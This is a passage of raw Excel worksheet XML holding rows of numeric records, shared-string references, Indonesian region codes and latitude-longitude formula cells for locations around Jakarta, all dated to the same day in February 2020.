      </c>
      <c r="S837" t="s">
        <v>49</v>
      </c>
      <c r="T837" t="s">
        <v>33</v>
      </c>
      <c r="U837" s="5">
        <v>10687771</v>
      </c>
      <c r="V837" s="5" t="s">
        <v>15055</v>
      </c>
      <c r="W837" s="5">
        <v>-625166</v>
      </c>
      <c r="X837" t="s">
        <v>19029</v>
      </c>
      <c r="Y837" t="str">
        <f t="shared" si="13"/>
        <v>-6.25166,106.87771</v>
      </c>
    </row>
    <row r="838" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A838">
        <v>108408</v>
      </c>
      <c r="B838" s="1">
        <v>43883</v>
      </c>
      <c r="C838">
        <v>1</v>
      </c>
      <c r="D838" t="s">
        <v>22</v>
      </c>
      <c r="E838" t="s">
        <v>23</v>
      </c>
      <c r="F838" t="s">
        <v>3317</v>
      </c>
      <c r="G838" t="s">
        <v>3318</v>
      </c>
      <c r="H838" t="s">
        <v>26</v>
      </c>
      <c r="I838" t="s">
        <v>166</v>
      </c>
      <c r="J838" t="s">
        <v>2627</v>
      </c>
      <c r="L838" t="s">
        <v>3319</v>
      </c>
      <c r="M838">
        <v>3275061004</v>
      </c>
      <c r="N838">
        <v>3275061</v>
      </c>
      <c r="O838">
        <v>3275</v>
      </c>
      <c r="P838">
        <v>32</v>
      </c>
      <c r="Q838" t="s">
        <v>39</v>
      </c>
      <c r="R838" t="s">
        <v>40</v>
      </c>
      <c r="S838" t="s">
        <v>41</v>
      </c>
      <c r="T838" t="s">
        <v>42</v>
      </c>
      <c r="U838" s="5">
        <v>10699239</v>
      </c>
      <c r="V838" s="5" t="s">
        <v>15231</v>
      </c>
      <c r="W838" s="5">
        <v>-617523</v>
      </c>
      <c r="X838" t="s">
        <v>19030</v>
      </c>
      <c r="Y838" t="str">
        <f t="shared" si="13"/>
        <v>-6.17523,106.99239</v>
      </c>
    </row>
    <row r="839" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A839">
        <v>108409</v>
      </c>
      <c r="B839" s="1">
        <v>43883</v>
      </c>
      <c r="C839">
        <v>1</v>
      </c>
      <c r="D839" t="s">
        <v>22</v>
      </c>
      <c r="E839" t="s">
        <v>23</v>
      </c>
      <c r="F839" t="s">
        <v>3320</v>
      </c>
      <c r="G839" t="s">
        <v>3321</v>
      </c>
      <c r="H839" t="s">
        <v>26</v>
      </c>
      <c r="I839" t="s">
        <v>517</v>
      </c>
      <c r="J839" t="s">
        <v>2527</v>
      </c>
      <c r="L839" t="s">
        <v>3322</v>
      </c>
      <c r="M839">
        <v>3174030006</v>
      </c>
      <c r="N839">
        <v>3174030</v>
      </c>
      <c r="O839">
        <v>3174</v>
      </c>
      <c r="P839">
        <v>31</v>
      </c>
      <c r="Q839" t="s">
        <v>2529</v>
      </c>
      <c r="R839" t="s">
        <v>1487</v>
      </c>
      <c r="S839" t="s">
        <v>32</v>
      </c>
      <c r="T839" t="s">
        <v>33</v>
      </c>
      <c r="U839" s="5">
        <v>10680596</v>
      </c>
      <c r="V839" s="5" t="s">
        <v>15232</v>
      </c>
      <c r="W839" s="5">
        <v>-618028</v>
      </c>
      <c r="X839" t="s">
        <v>19031</v>
      </c>
      <c r="Y839" t="str">
        <f t="shared" si="13"/>
        <v>-6.18028,106.80596</v>
      </c>
    </row>
    <row r="840" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A840">
        <v>108410</v>
      </c>
      <c r="B840" s="1">
        <v>43883</v>
      </c>
      <c r="C840">
        <v>1</v>
      </c>
      <c r="D840" t="s">
        <v>22</v>
      </c>
      <c r="E840" t="s">
        <v>23</v>
      </c>
      <c r="F840" t="s">
        <v>3323</v>
      </c>
      <c r="G840" t="s">
        <v>3324</v>
      </c>
      <c r="H840" t="s">
        <v>26</v>
      </c>
      <c r="I840" t="s">
        <v>2005</v>
      </c>
      <c r="J840" t="s">
        <v>2627</v>
      </c>
      <c r="M840">
        <v>3275061004</v>
      </c>
      <c r="N840">
        <v>3275061</v>
      </c>
      <c r="O840">
        <v>3275</v>
      </c>
      <c r="P840">
        <v>32</v>
      </c>
      <c r="Q840" t="s">
        <v>39</v>
      </c>
      <c r="R840" t="s">
        <v>40</v>
      </c>
      <c r="S840" t="s">
        <v>41</v>
      </c>
      <c r="T840" t="s">
        <v>42</v>
      </c>
      <c r="U840" s="5">
        <v>10699085</v>
      </c>
      <c r="V840" s="5" t="s">
        <v>15233</v>
      </c>
      <c r="W840" s="5">
        <v>-617610</v>
      </c>
      <c r="X840" t="s">
        <v>19032</v>
      </c>
      <c r="Y840" t="str">
        <f t="shared" si="13"/>
        <v>-6.17610,106.99085</v>
      </c>
    </row>
    <row r="841" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A841">
        <v>108411</v>
      </c>
      <c r="B841" s="1">
        <v>43883</v>
      </c>
      <c r="C841">
        <v>1</v>
      </c>
      <c r="D841" t="s">
        <v>22</v>
      </c>
      <c r="E841" t="s">
        <v>23</v>
      </c>
      <c r="F841" t="s">
        <v>3325</v>
      </c>
      <c r="G841" t="s">
        <v>3326</v>
      </c>
      <c r="H841" t="s">
        <v>26</v>
      </c>
      <c r="I841" t="s">
        <v>65</v>
      </c>
      <c r="J841" t="s">
        <v>3327</v>
      </c>
      <c r="M841">
        <v>3172040003</v>
      </c>
      <c r="N841">
        <v>3172040</v>
      </c>
      <c r="O841">
        <v>3172</v>
      </c>
      <c r="P841">
        <v>31</v>
      </c>
      <c r="Q841" t="s">
        <v>552</v>
      </c>
      <c r="R841" t="s">
        <v>281</v>
      </c>
      <c r="S841" t="s">
        <v>49</v>
      </c>
      <c r="T841" t="s">
        <v>33</v>
      </c>
      <c r="U841" s="5">
        <v>10687444</v>
      </c>
      <c r="V841" s="5" t="s">
        <v>15234</v>
      </c>
      <c r="W841" s="5">
        <v>-625381</v>
      </c>
      <c r="X841" t="s">
        <v>19033</v>
      </c>
      <c r="Y841" t="str">
        <f t="shared" si="13"/>
        <v>-6.25381,106.87444</v>
      </c>
    </row>
    <row r="842" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A842">
        <v>108412</v>
      </c>
      <c r="B842" s="1">
        <v>43883</v>
      </c>
      <c r="C842">
        <v>1</v>
      </c>
      <c r="D842" t="s">
        <v>22</v>
      </c>
      <c r="E842" t="s">
        <v>23</v>
      </c>
      <c r="F842" t="s">
        <v>3328</v>
      </c>
      <c r="H842" t="s">
        <v>26</v>
      </c>
      <c r="I842" t="s">
        <v>1689</v>
      </c>
      <c r="J842" t="s">
        <v>3066</v>
      </c>
      <c r="L842" t="s">
        <v>3329</v>
      </c>
      <c r="M842">
        <v>3173020001</v>
      </c>
      <c r="N842">
        <v>3173020</v>
      </c>
      <c r="O842">
        <v>3173</v>
      </c>
      <c r="P842">
        <v>31</v>
      </c>
      <c r="Q842" t="s">
        <v>179</v>
      </c>
      <c r="R842" t="s">
        <v>179</v>
      </c>
      <c r="S842" t="s">
        <v>62</v>
      </c>
      <c r="T842" t="s">
        <v>33</v>
      </c>
      <c r="U842" s="5">
        <v>10683380</v>
      </c>
      <c r="V842" s="5" t="s">
        <v>15158</v>
      </c>
      <c r="W842" s="5">
        <v>-619926</v>
      </c>
      <c r="X842" t="s">
        <v>18957</v>
      </c>
      <c r="Y842" t="str">
        <f t="shared" si="13"/>
        <v>-6.19926,106.83380</v>
      </c>
    </row>
    <row r="843" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A843">
        <v>108413</v>
      </c>
      <c r="B843" s="1">
        <v>43883</v>
      </c>
      <c r="C843">
        <v>1</v>
      </c>
      <c r="D843" t="s">
        <v>22</v>
      </c>
      <c r="E843" t="s">
        <v>23</v>
      </c>
      <c r="F843" t="s">
        <v>3330</v>
      </c>
      <c r="H843" t="s">
        <v>26</v>
      </c>
      <c r="I843" t="s">
        <v>2005</v>
      </c>
      <c r="J843" t="s">
        <v>586</v>
      </c>
      <c r="L843" t="s">
        <v>3331</v>
      </c>
      <c r="M843">
        <v>3173050002</v>
      </c>
      <c r="N843">
        <v>3173050</v>
      </c>
      <c r="O843">
        <v>3173</v>
      </c>
      <c r="P843">
        <v>31</v>
      </c>
      <c r="Q843" t="s">
        <v>588</v>
      </c>
      <c r="R843" t="s">
        <v>589</v>
      </c>
      <c r="S843" t="s">
        <v>62</v>
      </c>
      <c r="T843" t="s">
        <v>33</v>
      </c>
      <c r="U843" s="5">
        <v>10687165</v>
      </c>
      <c r="V843" s="5" t="s">
        <v>14805</v>
      </c>
      <c r="W843" s="5">
        <v>-617440</v>
      </c>
      <c r="X843" t="s">
        <v>18426</v>
      </c>
      <c r="Y843" t="str">
        <f t="shared" si="13"/>
        <v>-6.17440,106.87165</v>
      </c>
    </row>
    <row r="844" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A844">
        <v>108414</v>
      </c>
      <c r="B844" s="1">
        <v>43883</v>
      </c>
      <c r="C844">
        <v>1</v>
      </c>
      <c r="D844" t="s">
        <v>22</v>
      </c>
      <c r="E844" t="s">
        <v>23</v>
      </c>
      <c r="F844" t="s">
        <v>3332</v>
      </c>
      <c r="G844" t="s">
        <v>3333</v>
      </c>
      <c r="H844" t="s">
        <v>26</v>
      </c>
      <c r="I844" t="s">
        <v>843</v>
      </c>
      <c r="J844" t="s">
        <v>3334</v>
      </c>
      <c r="L844" t="s">
        <v>3335</v>
      </c>
      <c r="M844">
        <v>3173050003</v>
      </c>
      <c r="N844">
        <v>3173050</v>
      </c>
      <c r="O844">
        <v>3173</v>
      </c>
      <c r="P844">
        <v>31</v>
      </c>
      <c r="Q844" t="s">
        <v>2333</v>
      </c>
      <c r="R844" t="s">
        <v>589</v>
      </c>
      <c r="S844" t="s">
        <v>62</v>
      </c>
      <c r="T844" t="s">
        <v>33</v>
      </c>
      <c r="U844" s="5">
        <v>10686195</v>
      </c>
      <c r="V844" s="5" t="s">
        <v>15235</v>
      </c>
      <c r="W844" s="5">
        <v>-618169</v>
      </c>
      <c r="X844" t="s">
        <v>19034</v>
      </c>
      <c r="Y844" t="str">
        <f t="shared" si="13"/>
        <v>-6.18169,106.86195</v>
      </c>
    </row>
    <row r="845" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A845">
        <v>108415</v>
      </c>
      <c r="B845" s="1">
        <v>43883</v>
      </c>
      <c r="C845">
        <v>1</v>
      </c>
      <c r="D845" t="s">
        <v>22</v>
      </c>
      <c r="E845" t="s">
        <v>23</v>
      </c>
      <c r="F845" t="s">
        <v>3336</v>
      </c>
      <c r="H845" t="s">
        <v>26</v>
      </c>
      <c r="I845" t="s">
        <v>1633</v>
      </c>
      <c r="J845" t="s">
        <v>3337</v>
      </c>
      <c r="L845" t="s">
        <v>250</v>
      </c>
      <c r="M845">
        <v>3172070001</v>
      </c>
      <c r="N845">
        <v>3172070</v>
      </c>
      <c r="O845">
        <v>3172</v>
      </c>
      <c r="P845">
        <v>31</v>
      </c>
      <c r="Q845" t="s">
        <v>127</v>
      </c>
      <c r="R845" t="s">
        <v>128</v>
      </c>
      <c r="S845" t="s">
        <v>49</v>
      </c>
      <c r="T845" t="s">
        <v>33</v>
      </c>
      <c r="U845" s="5">
        <v>10689903</v>
      </c>
      <c r="V845" s="5" t="s">
        <v>15236</v>
      </c>
      <c r="W845" s="5">
        <v>-623490</v>
      </c>
      <c r="X845" t="s">
        <v>19035</v>
      </c>
      <c r="Y845" t="str">
        <f t="shared" si="13"/>
        <v>-6.23490,106.89903</v>
      </c>
    </row>
    <row r="846" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A846">
        <v>108416</v>
      </c>
      <c r="B846" s="1">
        <v>43883</v>
      </c>
      <c r="C846">
        <v>1</v>
      </c>
      <c r="D846" t="s">
        <v>22</v>
      </c>
      <c r="E846" t="s">
        <v>23</v>
      </c>
      <c r="F846" t="s">
        <v>3338</v>
      </c>
      <c r="G846" t="s">
        <v>3339</v>
      </c>
      <c r="H846" t="s">
        <v>26</v>
      </c>
      <c r="I846" t="s">
        <v>908</v>
      </c>
      <c r="J846" t="s">
        <v>2683</v>
      </c>
      <c r="L846" t="s">
        <v>3340</v>
      </c>
      <c r="M846">
        <v>3172070002</v>
      </c>
      <c r="N846">
        <v>3172070</v>
      </c>
      <c r="O846">
        <v>3172</v>
      </c>
      <c r="P846">
        <v>31</v>
      </c>
      <c r="Q846" t="s">
        <v>128</v>
      </c>
      <c r="R846" t="s">
        <v>128</v>
      </c>
      <c r="S846" t="s">
        <v>49</v>
      </c>
      <c r="T846" t="s">
        <v>33</v>
      </c>
      <c r="U846" s="5">
        <v>10691126</v>
      </c>
      <c r="V846" s="5" t="s">
        <v>15237</v>
      </c>
      <c r="W846" s="5">
        <v>-624613</v>
      </c>
      <c r="X846" t="s">
        <v>19036</v>
      </c>
      <c r="Y846" t="str">
        <f t="shared" si="13"/>
        <v>-6.24613,106.91126</v>
      </c>
    </row>
    <row r="847" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A847">
        <v>108417</v>
      </c>
      <c r="B847" s="1">
        <v>43883</v>
      </c>
      <c r="C847">
        <v>1</v>
      </c>
      <c r="D847" t="s">
        <v>22</v>
      </c>
      <c r="E847" t="s">
        <v>23</v>
      </c>
      <c r="F847" t="s">
        <v>3341</v>
      </c>
      <c r="G847" t="s">
        <v>3342</v>
      </c>
      <c r="H847" t="s">
        <v>26</v>
      </c>
      <c r="I847" t="s">
        <v>1194</v>
      </c>
      <c r="J847" t="s">
        <v>3343</v>
      </c>
      <c r="L847" t="s">
        <v>3344</v>
      </c>
      <c r="M847">
        <v>3175050001</v>
      </c>
      <c r="N847">
        <v>3175050</v>
      </c>
      <c r="O847">
        <v>3175</v>
      </c>
      <c r="P847">
        <v>31</v>
      </c>
      <c r="Q847" t="s">
        <v>1037</v>
      </c>
      <c r="R847" t="s">
        <v>1013</v>
      </c>
      <c r="S847" t="s">
        <v>547</v>
      </c>
      <c r="T847" t="s">
        <v>33</v>
      </c>
      <c r="U847" s="5">
        <v>10690909</v>
      </c>
      <c r="V847" s="5" t="s">
        <v>15238</v>
      </c>
      <c r="W847" s="5">
        <v>-615259</v>
      </c>
      <c r="X847" t="s">
        <v>19037</v>
      </c>
      <c r="Y847" t="str">
        <f t="shared" si="13"/>
        <v>-6.15259,106.90909</v>
      </c>
    </row>
    <row r="848" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A848">
        <v>108418</v>
      </c>
      <c r="B848" s="1">
        <v>43883</v>
      </c>
      <c r="C848">
        <v>1</v>
      </c>
      <c r="D848" t="s">
        <v>22</v>
      </c>
      <c r="E848" t="s">
        <v>23</v>
      </c>
      <c r="F848" t="s">
        <v>3345</v>
      </c>
      <c r="G848" t="s">
        <v>3346</v>
      </c>
      <c r="H848" t="s">
        <v>26</v>
      </c>
      <c r="I848" t="s">
        <v>882</v>
      </c>
      <c r="J848" t="s">
        <v>3347</v>
      </c>
      <c r="M848">
        <v>3173040003</v>
      </c>
      <c r="N848">
        <v>3173040</v>
      </c>
      <c r="O848">
        <v>3173</v>
      </c>
      <c r="P848">
        <v>31</v>
      </c>
      <c r="Q848" t="s">
        <v>2346</v>
      </c>
      <c r="R848" t="s">
        <v>1598</v>
      </c>
      <c r="S848" t="s">
        <v>62</v>
      </c>
      <c r="T848" t="s">
        <v>33</v>
      </c>
      <c r="U848" s="5">
        <v>10684792</v>
      </c>
      <c r="V848" s="5" t="s">
        <v>15239</v>
      </c>
      <c r="W848" s="5">
        <v>-617957</v>
      </c>
      <c r="X848" t="s">
        <v>19038</v>
      </c>
      <c r="Y848" t="str">
        <f t="shared" si="13"/>
        <v>-6.17957,106.84792</v>
      </c>
    </row>
    <row r="849" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A849">
        <v>108419</v>
      </c>
      <c r="B849" s="1">
        <v>43883</v>
      </c>
      <c r="C849">
        <v>1</v>
      </c>
      <c r="D849" t="s">
        <v>22</v>
      </c>
      <c r="E849" t="s">
        <v>23</v>
      </c>
      <c r="F849" t="s">
        <v>3348</v>
      </c>
      <c r="G849" t="s">
        <v>3349</v>
      </c>
      <c r="H849" t="s">
        <v>26</v>
      </c>
      <c r="I849" t="s">
        <v>1340</v>
      </c>
      <c r="J849" t="s">
        <v>3350</v>
      </c>
      <c r="M849">
        <v>3172090005</v>
      </c>
      <c r="N849">
        <v>3172090</v>
      </c>
      <c r="O849">
        <v>3172</v>
      </c>
      <c r="P849">
        <v>31</v>
      </c>
      <c r="Q849" t="s">
        <v>2749</v>
      </c>
      <c r="R849" t="s">
        <v>890</v>
      </c>
      <c r="S849" t="s">
        <v>49</v>
      </c>
      <c r="T849" t="s">
        <v>33</v>
      </c>
      <c r="U849" s="5">
        <v>10688378</v>
      </c>
      <c r="V849" s="5" t="s">
        <v>15240</v>
      </c>
      <c r="W849" s="5">
        <v>-619462</v>
      </c>
      <c r="X849" t="s">
        <v>19039</v>
      </c>
      <c r="Y849" t="str">
        <f t="shared" si="13"/>
        <v>-6.19462,106.88378</v>
      </c>
    </row>
    <row r="850" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A850">
        <v>108420</v>
      </c>
      <c r="B850" s="1">
        <v>43883</v>
      </c>
      <c r="C850">
        <v>1</v>
      </c>
      <c r="D850" t="s">
        <v>22</v>
      </c>
      <c r="E850" t="s">
        <v>23</v>
      </c>
      <c r="F850" t="s">
        <v>3351</v>
      </c>
      <c r="G850" t="s">
        <v>3352</v>
      </c>
      <c r="H850" t="s">
        <v>26</v>
      </c>
      <c r="I850" t="s">
        <v>1953</v>
      </c>
      <c r="J850" t="s">
        <v>138</v>
      </c>
      <c r="L850" t="s">
        <v>3353</v>
      </c>
      <c r="M850">
        <v>3172080005</v>
      </c>
      <c r="N850">
        <v>3172080</v>
      </c>
      <c r="O850">
        <v>3172</v>
      </c>
      <c r="P850">
        <v>31</v>
      </c>
      <c r="Q850" t="s">
        <v>140</v>
      </c>
      <c r="R850" t="s">
        <v>141</v>
      </c>
      <c r="S850" t="s">
        <v>49</v>
      </c>
      <c r="T850" t="s">
        <v>33</v>
      </c>
      <c r="U850" s="5">
        <v>10695042</v>
      </c>
      <c r="V850" s="5" t="s">
        <v>15241</v>
      </c>
      <c r="W850" s="5">
        <v>-617631</v>
      </c>
      <c r="X850" t="s">
        <v>19040</v>
      </c>
      <c r="Y850" t="str">
        <f t="shared" si="13"/>
        <v>-6.17631,106.95042</v>
      </c>
    </row>
    <row r="851" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A851">
        <v>108421</v>
      </c>
      <c r="B851" s="1">
        <v>43883</v>
      </c>
      <c r="C851">
        <v>1</v>
      </c>
      <c r="D851" t="s">
        <v>22</v>
      </c>
      <c r="E851" t="s">
        <v>23</v>
      </c>
      <c r="F851" t="s">
        <v>3354</v>
      </c>
      <c r="G851" t="s">
        <v>3355</v>
      </c>
      <c r="H851" t="s">
        <v>26</v>
      </c>
      <c r="I851" t="s">
        <v>2165</v>
      </c>
      <c r="J851" t="s">
        <v>3229</v>
      </c>
      <c r="L851" t="s">
        <v>3356</v>
      </c>
      <c r="M851">
        <v>3175050002</v>
      </c>
      <c r="N851">
        <v>3175050</v>
      </c>
      <c r="O851">
        <v>3175</v>
      </c>
      <c r="P851">
        <v>31</v>
      </c>
      <c r="Q851" t="s">
        <v>1012</v>
      </c>
      <c r="R851" t="s">
        <v>1013</v>
      </c>
      <c r="S851" t="s">
        <v>547</v>
      </c>
      <c r="T851" t="s">
        <v>33</v>
      </c>
      <c r="U851" s="5">
        <v>10690282</v>
      </c>
      <c r="V851" s="5" t="s">
        <v>15242</v>
      </c>
      <c r="W851" s="5">
        <v>-616864</v>
      </c>
      <c r="X851" t="s">
        <v>19041</v>
      </c>
      <c r="Y851" t="str">
        <f t="shared" si="13"/>
        <v>-6.16864,106.90282</v>
      </c>
    </row>
    <row r="852" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A852">
        <v>108422</v>
      </c>
      <c r="B852" s="1">
        <v>43883</v>
      </c>
      <c r="C852">
        <v>1</v>
      </c>
      <c r="D852" t="s">
        <v>22</v>
      </c>
      <c r="E852" t="s">
        <v>23</v>
      </c>
      <c r="F852" t="s">
        <v>3357</v>
      </c>
      <c r="H852" t="s">
        <v>26</v>
      </c>
      <c r="I852" t="s">
        <v>2139</v>
      </c>
      <c r="J852" t="s">
        <v>1320</v>
      </c>
      <c r="L852" t="s">
        <v>3358</v>
      </c>
      <c r="M852">
        <v>3175050002</v>
      </c>
      <c r="N852">
        <v>3175050</v>
      </c>
      <c r="O852">
        <v>3175</v>
      </c>
      <c r="P852">
        <v>31</v>
      </c>
      <c r="Q852" t="s">
        <v>1012</v>
      </c>
      <c r="R852" t="s">
        <v>1013</v>
      </c>
      <c r="S852" t="s">
        <v>547</v>
      </c>
      <c r="T852" t="s">
        <v>33</v>
      </c>
      <c r="U852" s="5">
        <v>10690369</v>
      </c>
      <c r="V852" s="5" t="s">
        <v>15243</v>
      </c>
      <c r="W852" s="5">
        <v>-617808</v>
      </c>
      <c r="X852" t="s">
        <v>19042</v>
      </c>
      <c r="Y852" t="str">
        <f t="shared" si="13"/>
        <v>-6.17808,106.90369</v>
      </c>
    </row>
    <row r="853" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A853">
        <v>108423</v>
      </c>
      <c r="B853" s="1">
        <v>43883</v>
      </c>
      <c r="C853">
        <v>1</v>
      </c>
      <c r="D853" t="s">
        <v>22</v>
      </c>
      <c r="E853" t="s">
        <v>23</v>
      </c>
      <c r="F853" t="s">
        <v>3359</v>
      </c>
      <c r="H853" t="s">
        <v>26</v>
      </c>
      <c r="I853" t="s">
        <v>523</v>
      </c>
      <c r="J853" t="s">
        <v>3360</v>
      </c>
      <c r="L853" t="s">
        <v>3252</v>
      </c>
      <c r="M853">
        <v>3172060003</v>
      </c>
      <c r="N853">
        <v>3172060</v>
      </c>
      <c r="O853">
        <v>3172</v>
      </c>
      <c r="P853">
        <v>31</v>
      </c>
      <c r="Q853" t="s">
        <v>2832</v>
      </c>
      <c r="R853" t="s">
        <v>48</v>
      </c>
      <c r="S853" t="s">
        <v>49</v>
      </c>
      <c r="T853" t="s">
        <v>33</v>
      </c>
      <c r="U853" s="5">
        <v>10688315</v>
      </c>
      <c r="V853" s="5" t="s">
        <v>15244</v>
      </c>
      <c r="W853" s="5">
        <v>-623493</v>
      </c>
      <c r="X853" t="s">
        <v>18311</v>
      </c>
      <c r="Y853" t="str">
        <f t="shared" si="13"/>
        <v>-6.23493,106.88315</v>
      </c>
    </row>
    <row r="854" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A854">
        <v>108424</v>
      </c>
      <c r="B854" s="1">
        <v>43883</v>
      </c>
      <c r="C854">
        <v>1</v>
      </c>
      <c r="D854" t="s">
        <v>22</v>
      </c>
      <c r="E854" t="s">
        <v>23</v>
      </c>
      <c r="F854" t="s">
        <v>3361</v>
      </c>
      <c r="G854" t="s">
        <v>3362</v>
      </c>
      <c r="H854" t="s">
        <v>26</v>
      </c>
      <c r="I854" t="s">
        <v>2962</v>
      </c>
      <c r="J854" t="s">
        <v>2331</v>
      </c>
      <c r="L854" t="s">
        <v>3363</v>
      </c>
      <c r="M854">
        <v>3173050003</v>
      </c>
      <c r="N854">
        <v>3173050</v>
      </c>
      <c r="O854">
        <v>3173</v>
      </c>
      <c r="P854">
        <v>31</v>
      </c>
      <c r="Q854" t="s">
        <v>2333</v>
      </c>
      <c r="R854" t="s">
        <v>589</v>
      </c>
      <c r="S854" t="s">
        <v>62</v>
      </c>
      <c r="T854" t="s">
        <v>33</v>
      </c>
      <c r="U854" s="5">
        <v>10686534</v>
      </c>
      <c r="V854" s="5" t="s">
        <v>15245</v>
      </c>
      <c r="W854" s="5">
        <v>-618093</v>
      </c>
      <c r="X854" t="s">
        <v>19043</v>
      </c>
      <c r="Y854" t="str">
        <f t="shared" si="13"/>
        <v>-6.18093,106.86534</v>
      </c>
    </row>
    <row r="855" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A855">
        <v>108425</v>
      </c>
      <c r="B855" s="1">
        <v>43883</v>
      </c>
      <c r="C855">
        <v>1</v>
      </c>
      <c r="D855" t="s">
        <v>22</v>
      </c>
      <c r="E855" t="s">
        <v>23</v>
      </c>
      <c r="F855" t="s">
        <v>3364</v>
      </c>
      <c r="H855" t="s">
        <v>26</v>
      </c>
      <c r="I855" t="s">
        <v>1538</v>
      </c>
      <c r="J855" t="s">
        <v>2627</v>
      </c>
      <c r="L855" t="s">
        <v>3365</v>
      </c>
      <c r="M855">
        <v>3201190010</v>
      </c>
      <c r="N855">
        <v>3201190</v>
      </c>
      <c r="O855">
        <v>3201</v>
      </c>
      <c r="P855">
        <v>32</v>
      </c>
      <c r="Q855" t="s">
        <v>419</v>
      </c>
      <c r="R855" t="s">
        <v>420</v>
      </c>
      <c r="S855" t="s">
        <v>421</v>
      </c>
      <c r="T855" t="s">
        <v>42</v>
      </c>
      <c r="U855" s="5">
        <v>10696278</v>
      </c>
      <c r="V855" s="5" t="s">
        <v>15246</v>
      </c>
      <c r="W855" s="5">
        <v>-632333</v>
      </c>
      <c r="X855" t="s">
        <v>19044</v>
      </c>
      <c r="Y855" t="str">
        <f t="shared" si="13"/>
        <v>-6.32333,106.96278</v>
      </c>
    </row>
    <row r="856" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A856">
        <v>108426</v>
      </c>
      <c r="B856" s="1">
        <v>43883</v>
      </c>
      <c r="C856">
        <v>1</v>
      </c>
      <c r="D856" t="s">
        <v>22</v>
      </c>
      <c r="E856" t="s">
        <v>23</v>
      </c>
      <c r="F856" t="s">
        <v>3366</v>
      </c>
      <c r="G856" t="s">
        <v>3367</v>
      </c>
      <c r="H856" t="s">
        <v>26</v>
      </c>
      <c r="I856" t="s">
        <v>76</v>
      </c>
      <c r="J856" t="s">
        <v>1035</v>
      </c>
      <c r="L856" t="s">
        <v>3368</v>
      </c>
      <c r="M856">
        <v>3175050001</v>
      </c>
      <c r="N856">
        <v>3175050</v>
      </c>
      <c r="O856">
        <v>3175</v>
      </c>
      <c r="P856">
        <v>31</v>
      </c>
      <c r="Q856" t="s">
        <v>1037</v>
      </c>
      <c r="R856" t="s">
        <v>1013</v>
      </c>
      <c r="S856" t="s">
        <v>547</v>
      </c>
      <c r="T856" t="s">
        <v>33</v>
      </c>
      <c r="U856" s="5">
        <v>10689309</v>
      </c>
      <c r="V856" s="5" t="s">
        <v>15247</v>
      </c>
      <c r="W856" s="5">
        <v>-616078</v>
      </c>
      <c r="X856" t="s">
        <v>19045</v>
      </c>
      <c r="Y856" t="str">
        <f t="shared" si="13"/>
        <v>-6.16078,106.89309</v>
      </c>
    </row>
    <row r="857" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A857">
        <v>108427</v>
      </c>
      <c r="B857" s="1">
        <v>43883</v>
      </c>
      <c r="C857">
        <v>1</v>
      </c>
      <c r="D857" t="s">
        <v>22</v>
      </c>
      <c r="E857" t="s">
        <v>23</v>
      </c>
      <c r="F857" t="s">
        <v>3369</v>
      </c>
      <c r="G857" t="s">
        <v>3370</v>
      </c>
      <c r="H857" t="s">
        <v>26</v>
      </c>
      <c r="I857" t="s">
        <v>555</v>
      </c>
      <c r="J857" t="s">
        <v>3371</v>
      </c>
      <c r="L857" t="s">
        <v>250</v>
      </c>
      <c r="M857">
        <v>3172070001</v>
      </c>
      <c r="N857">
        <v>3172070</v>
      </c>
      <c r="O857">
        <v>3172</v>
      </c>
      <c r="P857">
        <v>31</v>
      </c>
      <c r="Q857" t="s">
        <v>127</v>
      </c>
      <c r="R857" t="s">
        <v>128</v>
      </c>
      <c r="S857" t="s">
        <v>49</v>
      </c>
      <c r="T857" t="s">
        <v>33</v>
      </c>
      <c r="U857" s="5">
        <v>10689509</v>
      </c>
      <c r="V857" s="5" t="s">
        <v>15248</v>
      </c>
      <c r="W857" s="5">
        <v>-622720</v>
      </c>
      <c r="X857" t="s">
        <v>19046</v>
      </c>
      <c r="Y857" t="str">
        <f t="shared" si="13"/>
        <v>-6.22720,106.89509</v>
      </c>
    </row>
    <row r="858" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A858">
        <v>108428</v>
      </c>
      <c r="B858" s="1">
        <v>43883</v>
      </c>
      <c r="C858">
        <v>1</v>
      </c>
      <c r="D858" t="s">
        <v>22</v>
      </c>
      <c r="E858" t="s">
        <v>23</v>
      </c>
      <c r="F858" t="s">
        <v>3372</v>
      </c>
      <c r="H858" t="s">
        <v>26</v>
      </c>
      <c r="I858" t="s">
        <v>1389</v>
      </c>
      <c r="J858" t="s">
        <v>3373</v>
      </c>
      <c r="L858" t="s">
        <v>3266</v>
      </c>
      <c r="M858">
        <v>3172080001</v>
      </c>
      <c r="N858">
        <v>3172080</v>
      </c>
      <c r="O858">
        <v>3172</v>
      </c>
      <c r="P858">
        <v>31</v>
      </c>
      <c r="Q858" t="s">
        <v>48</v>
      </c>
      <c r="R858" t="s">
        <v>141</v>
      </c>
      <c r="S858" t="s">
        <v>49</v>
      </c>
      <c r="T858" t="s">
        <v>33</v>
      </c>
      <c r="U858" s="5">
        <v>10692234</v>
      </c>
      <c r="V858" s="5" t="s">
        <v>15249</v>
      </c>
      <c r="W858" s="5">
        <v>-620740</v>
      </c>
      <c r="X858" t="s">
        <v>19047</v>
      </c>
      <c r="Y858" t="str">
        <f t="shared" si="13"/>
        <v>-6.20740,106.92234</v>
      </c>
    </row>
    <row r="859" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A859">
        <v>108429</v>
      </c>
      <c r="B859" s="1">
        <v>43883</v>
      </c>
      <c r="C859">
        <v>1</v>
      </c>
      <c r="D859" t="s">
        <v>22</v>
      </c>
      <c r="E859" t="s">
        <v>23</v>
      </c>
      <c r="F859" t="s">
        <v>3374</v>
      </c>
      <c r="G859" t="s">
